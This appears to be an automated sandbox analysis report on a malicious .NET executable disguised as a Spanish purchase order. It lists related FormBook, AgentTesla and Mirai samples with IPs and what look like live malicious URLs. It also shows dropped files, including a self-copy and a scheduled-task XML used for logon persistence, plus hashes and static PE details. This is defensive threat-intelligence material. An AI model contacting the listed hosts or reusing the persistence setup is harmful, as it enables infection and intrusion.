                                          E-dekont.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          • www.cruises-62138.bond/my26/?_fvPp=DhxFqfI9N7ytGMr7+SOPlgLH0+mxXzpNvffODTnmnzF1LX8PasEKVGrRTADD59/oI3Me&6lo8sx=KtF83LWPF
                                          Ziraat_Bankasi_Swift_Mesaji.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          • www.cruises-62138.bond/my26/?p0GXBjhh=DhxFqfI9N7ytGMr7+SOPlgLH0+mxXzpNvffODTnmnzF1LX8PasEKVGrRTADD59/oI3Me&a2M4_=p6zhqZXh8fXtT
                                          documents.exeGet hashmaliciousFormBookBrowse
                                          • www.dental-implants-67128.com/m82/?KrqT=g4STjb_HNLxln&1bK8=jznEly5c4zUjvuzMiM7ybihkFEHMyYsqyLnHFEG0p8DHrY+6vbbqUGzxXxElKz/zJY4r

                                          Domains

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          ssl1.prod.systemdragon.comorder-payment094093.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                          • 104.18.188.223
                                          SecuriteInfo.com.FileRepMalware.16340.31219.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                          • 104.17.158.1
                                          IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exeGet hashmaliciousFormBookBrowse
                                          • 104.17.157.1
                                          wLlREXsA9M.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          • 104.17.157.1
                                          sOjxIU25DP.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          • 104.17.157.1
                                          hi38VYWujz.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          • 104.17.158.1
                                          Payment_document.docx.docGet hashmaliciousFormBookBrowse
                                          • 104.17.158.1
                                          E-dekont_pdf.exeGet hashmaliciousFormBookBrowse
                                          • 104.17.157.1
                                          E-dekont_pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          • 104.17.158.1
                                          PO_3534272.exeGet hashmaliciousFormBookBrowse
                                          • 104.17.157.1
                                          ext-sq.squarespace.comAtt00173994.exeGet hashmaliciousFormBookBrowse
                                          • 198.185.159.144
                                          disjR92Xrrnc3aZ.exeGet hashmaliciousFormBookBrowse
                                          • 198.185.159.144
                                          2024 Lusail Fence-WITH STICKER-2-003.exeGet hashmaliciousFormBookBrowse
                                          • 198.185.159.144
                                          INVOICE - MV CNC BANGKOK - ST24PJ-278.exeGet hashmaliciousFormBookBrowse
                                          • 198.185.159.144
                                          Att0027592.exeGet hashmaliciousFormBookBrowse
                                          • 198.185.159.144
                                          kpCSGLBxAw2RnrW.exeGet hashmaliciousFormBookBrowse
                                          • 198.185.159.144
                                          DHL_AWB#6078538091.exeGet hashmaliciousFormBookBrowse
                                          • 198.185.159.144
                                          MT103-746394.docGet hashmaliciousFormBookBrowse
                                          • 198.185.159.144
                                          SecuriteInfo.com.Exploit.CVE-2018-0798.4.23906.18593.rtfGet hashmaliciousFormBookBrowse
                                          • 198.185.159.145
                                          AWB_NO_907853880911.exeGet hashmaliciousFormBookBrowse
                                          • 198.185.159.144

                                          ASNs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          CNSV-LLCUS8hd98EhtIFcYkb8.exeGet hashmaliciousFormBookBrowse
                                          • 192.250.231.28
                                          8eBzSB5cmamfLKJ.exeGet hashmaliciousFormBookBrowse
                                          • 192.250.231.28
                                          Urgent Quotation_pdf.exeGet hashmaliciousFormBookBrowse
                                          • 192.250.231.28
                                          Products volume.exeGet hashmaliciousFormBookBrowse
                                          • 192.250.231.28
                                          245087609-050738-sanlccjavap0003-1240_pdf .exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                          • 192.250.227.25
                                          e-DEKONT.exeGet hashmaliciousAgentTeslaBrowse
                                          • 192.250.227.28
                                          SecuriteInfo.com.Win32.PWSX-gen.1159.5272.exeGet hashmaliciousAgentTeslaBrowse
                                          • 192.250.232.15
                                          jpgcamscanner_20240521_0072345_JPEG.bat.exeGet hashmaliciousGuLoaderBrowse
                                          • 192.250.227.27
                                          quotation.docGet hashmaliciousUnknownBrowse
                                          • 192.250.227.28
                                          z8s945rPmZ.exeGet hashmaliciousSystemBCBrowse
                                          • 192.250.234.71
                                          SQUARESPACEUSAtt00173994.exeGet hashmaliciousFormBookBrowse
                                          • 198.185.159.144
                                          disjR92Xrrnc3aZ.exeGet hashmaliciousFormBookBrowse
                                          • 198.185.159.144
                                          http://scarlet-marigold-h469.squarespace.com/Get hashmaliciousUnknownBrowse
                                          • 198.185.159.177
                                          2024 Lusail Fence-WITH STICKER-2-003.exeGet hashmaliciousFormBookBrowse
                                          • 198.185.159.144
                                          INVOICE - MV CNC BANGKOK - ST24PJ-278.exeGet hashmaliciousFormBookBrowse
                                          • 198.185.159.144
                                          Att0027592.exeGet hashmaliciousFormBookBrowse
                                          • 198.185.159.144
                                          kpCSGLBxAw2RnrW.exeGet hashmaliciousFormBookBrowse
                                          • 198.185.159.144
                                          DHL_AWB#6078538091.exeGet hashmaliciousFormBookBrowse
                                          • 198.185.159.144
                                          yq5xNPpWCT.exeGet hashmaliciousPureLog Stealer, SystemBCBrowse
                                          • 198.185.159.145
                                          SecuriteInfo.com.Exploit.CVE-2018-0798.4.23906.18593.rtfGet hashmaliciousFormBookBrowse
                                          • 198.185.159.145
                                          CHINATELECOM-CORE-WAN-CN2ChinaTelecomNextGenerationCarrpKqvOdh3Sv.elfGet hashmaliciousMirai, MoobotBrowse
                                          • 123.170.2.151
                                          jew.arm.elfGet hashmaliciousUnknownBrowse
                                          • 59.61.58.218
                                          yUFX4wGvLW.elfGet hashmaliciousMirai, MoobotBrowse
                                          • 123.179.76.202
                                          1CZlhmRsza.elfGet hashmaliciousMirai, MoobotBrowse
                                          • 116.9.138.68
                                          MRnwgdHLYk.elfGet hashmaliciousMirai, MoobotBrowse
                                          • 117.39.92.9
                                          GOoY5QBqvC.elfGet hashmaliciousMirai, MoobotBrowse
                                          • 106.9.188.171
                                          arm4-20240623-2204.elfGet hashmaliciousMiraiBrowse
                                          • 123.170.2.122
                                          gt4t3NAdEr.elfGet hashmaliciousMiraiBrowse
                                          • 116.211.2.165
                                          QSX0atAPpN.elfGet hashmaliciousMiraiBrowse
                                          • 117.38.62.166
                                          GziBfLibYb.elfGet hashmaliciousMiraiBrowse
                                          • 222.87.211.74
                                          TEAMINTERNET-ASDEMKCC-MEC-RFQ-115-2024.exeGet hashmaliciousFormBookBrowse
                                          • 185.53.179.91
                                          http://pollyfill.ioGet hashmaliciousUnknownBrowse
                                          • 185.53.178.30
                                          mQY9ka5sW6hv2Ri.exeGet hashmaliciousFormBookBrowse
                                          • 185.53.179.90
                                          Cheat.malware_exe.exeGet hashmaliciousUnknownBrowse
                                          • 185.53.177.31
                                          Cheat.malware_exe.exeGet hashmaliciousUnknownBrowse
                                          • 185.53.177.31
                                          2024 Lusail Fence-WITH STICKER-2-003.exeGet hashmaliciousFormBookBrowse
                                          • 185.53.179.91
                                          DHL AWB DOCUMENT.pdf.exeGet hashmaliciousFormBookBrowse
                                          • 185.53.179.93
                                          yq5xNPpWCT.exeGet hashmaliciousPureLog Stealer, SystemBCBrowse
                                          • 185.53.177.112
                                          Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeGet hashmaliciousFormBookBrowse
                                          • 185.53.179.92
                                          DHL ARRIVAL DOCUMENTS.pdf.exeGet hashmaliciousFormBookBrowse
                                          • 185.53.179.90

                                          JA3 Fingerprints

                                          No context

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Orden de compra 0307AR24.exe.log

                                          Download File
                                          Process:C:\Users\user\Desktop\Orden de compra 0307AR24.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1216
                                          Entropy (8bit):5.34331486778365
                                          Encrypted:false
                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                          MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                          Malicious:true
                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RggSaCWUvAyNK.exe.log

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1216
                                          Entropy (8bit):5.34331486778365
                                          Encrypted:false
                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                          MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                          Malicious:false
                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:data
                                          Category:modified
                                          Size (bytes):2232
                                          Entropy (8bit):5.378486415808052
                                          Encrypted:false
                                          SSDEEP:48:fWSU4xc4RTmaoUeW+gZ9tK8NPZHUxL7u1iMuge//ZVyus:fLHxcIalLgZ2KRHWLOugos
                                          MD5:AFDE43A9E7B4FE73F558EAADAC9DC902
                                          SHA1:A8B7148F9972FC7299F5F69D555ED6C9B85793AD
                                          SHA-256:F6B97E93A21970BDB9CE8147326447D051BDF28D54F6D87158BBF9A8EA3E4C85
                                          SHA-512:8438A9D63EEE59EA5A68B728AA021958B929A890ECDB0F135EBF2D1FD08C2391C41429FE5DB3CA1E0B616BE49C384F0E5288E1C399372FC4FD514F71E036528A
                                          Malicious:false
                                          Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.ConfigurationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.4.................%...K... ...........System.Xml..<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4eipohrn.npd.ps1

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4sehwhfx.nms.ps1

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5uidenic.cxj.ps1

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ajfuvpqv.tya.ps1

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hhkpfsnm.5kl.psm1

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kjsalmwi.odf.psm1

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kkuvfx1h.md0.psm1

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_od4yqoom.odw.psm1

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\tmp362B.tmp

                                          Download File
                                          Process:C:\Users\user\Desktop\Orden de compra 0307AR24.exe
                                          File Type:XML 1.0 document, ASCII text
                                          Category:dropped
                                          Size (bytes):1600
                                          Entropy (8bit):5.100670563915343
                                          Encrypted:false
                                          SSDEEP:24:2di4+S2qhHb1eHky1mIHdUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtLqxvn:cge7QYrFdOFzOzN33ODOiDdKrsuTKv
                                          MD5:6A3333833D2CFBAE8839B99F424E7D5D
                                          SHA1:CEAC6D03B27A1C2EC042C9F61DD941AB343A1A33
                                          SHA-256:9F4100077BC447FC2A854A683817386FDE3BF015A5ECC896B3223CDC1E5A01EF
                                          SHA-512:B47F6009B4521E5E4B338785984C7B4506317FB7BC6754F630611678A993F2B9431EA0B523032D4F28C6F1698630E1DCA4E982FB9D8DA4745F287CD95504F6E4
                                          Malicious:true
                                          Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <Run

                                          C:\Users\user\AppData\Local\Temp\tmp5339.tmp

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exe
                                          File Type:XML 1.0 document, ASCII text
                                          Category:dropped
                                          Size (bytes):1600
                                          Entropy (8bit):5.100670563915343
                                          Encrypted:false
                                          SSDEEP:24:2di4+S2qhHb1eHky1mIHdUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtLqxvn:cge7QYrFdOFzOzN33ODOiDdKrsuTKv
                                          MD5:6A3333833D2CFBAE8839B99F424E7D5D
                                          SHA1:CEAC6D03B27A1C2EC042C9F61DD941AB343A1A33
                                          SHA-256:9F4100077BC447FC2A854A683817386FDE3BF015A5ECC896B3223CDC1E5A01EF
                                          SHA-512:B47F6009B4521E5E4B338785984C7B4506317FB7BC6754F630611678A993F2B9431EA0B523032D4F28C6F1698630E1DCA4E982FB9D8DA4745F287CD95504F6E4
                                          Malicious:false
                                          Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <Run

                                          C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exe

                                          Download File
                                          Process:C:\Users\user\Desktop\Orden de compra 0307AR24.exe
                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):861704
                                          Entropy (8bit):7.645357408649112
                                          Encrypted:false
                                          SSDEEP:12288:xlGi6JNf+wrwcmujqGaCWcpHrdTIonHhX5AsYzYlNTpGGFNtLPHU3GizlZjf9/8y:ShJtCuqGzWcnIuhp9ycGOBmA6
                                          MD5:7BB0F568CE14D2350C704AEA2C4BC9DE
                                          SHA1:3C6CC8DE9A66613CE41F37CF1FD22990E80CE725
                                          SHA-256:EAFFC7CC6DA06F5894642BB88FFF4A0186CF61100558AF3CB552145F86D8E041
                                          SHA-512:F9B5DF159BDA1AADA29FA079B9B1CBBF054828DA34FE46F3BBAB140AAEBE5C135B1DE25ACB53E3CF59B72AF80CB6199464E0A0E32F5A687E0FB7BE9B778C057D
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          • Antivirus: ReversingLabs, Detection: 26%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...*V.f..............0..`..........n.... ........@.. .......................@............@................................. ...K........................6... ....................................................... ............... ..H............text...t_... ...`.................. ..`.rsrc................b..............@..@.reloc....... ......................@..B................P.......H.......p...............H...(........................................................................*..*&..(.....*R..{.....o....o%....*R...o....oi...(8....*B..{.....<o.....*B..{......o.....*B..{......o.....*>..{.....o.....*B..{......o.....*>..{.....o.....*:..{....o.....*v.rW..p.o....oi...(C...(D...&*R..{.....o....o3...&*...{.....o....o.....o....o....o.....*...{.....{....o[....{....o]...o.....*nr...p......%..+.(.........*2......s>...*"..o?...*..o@...*"..(A...*.(B...*"..(C...*

                                          C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exe:Zone.Identifier

                                          Download File
                                          Process:C:\Users\user\Desktop\Orden de compra 0307AR24.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):26
                                          Entropy (8bit):3.95006375643621
                                          Encrypted:false
                                          SSDEEP:3:ggPYV:rPYV
                                          MD5:187F488E27DB4AF347237FE461A079AD
                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                          Malicious:true
                                          Preview:[ZoneTransfer]....ZoneId=0

                                          Static File Info

                                          General

                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Entropy (8bit):7.645357408649112
                                          TrID:
                                          • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                          • Win32 Executable (generic) a (10002005/4) 49.97%
                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                          • DOS Executable Generic (2002/1) 0.01%
                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                          File name:Orden de compra 0307AR24.exe
                                          File size:861'704 bytes
                                          MD5:7bb0f568ce14d2350c704aea2c4bc9de
                                          SHA1:3c6cc8de9a66613ce41f37cf1fd22990e80ce725
                                          SHA256:eaffc7cc6da06f5894642bb88fff4a0186cf61100558af3cb552145f86d8e041
                                          SHA512:f9b5df159bda1aada29fa079b9b1cbbf054828da34fe46f3bbab140aaebe5c135b1de25acb53e3cf59b72af80cb6199464e0a0e32f5a687e0fb7be9b778c057d
                                          SSDEEP:12288:xlGi6JNf+wrwcmujqGaCWcpHrdTIonHhX5AsYzYlNTpGGFNtLPHU3GizlZjf9/8y:ShJtCuqGzWcnIuhp9ycGOBmA6
                                          TLSH:9605C0E87340A4AED85BC179D4765D63E673B11F9E1A410E2453BE4B7C2E343C9238AB
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...*V.f..............0..`..........n.... ........@.. .......................@............@................................

                                          File Icon

                                          Icon Hash:2eec8e8cb683b9b1

                                          Static PE Info

                                          General

                                          Entrypoint:0x4b7f6e
                                          Entrypoint Section:.text
                                          Digitally signed:true
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                          Time Stamp:0x6685562A [Wed Jul 3 13:46:18 2024 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
